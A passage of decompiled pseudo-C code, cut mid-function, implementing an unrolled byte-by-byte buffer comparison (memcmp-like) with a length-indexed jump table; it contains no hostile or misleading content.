																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L527;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M00BCF68A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L528;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L528;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L528;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
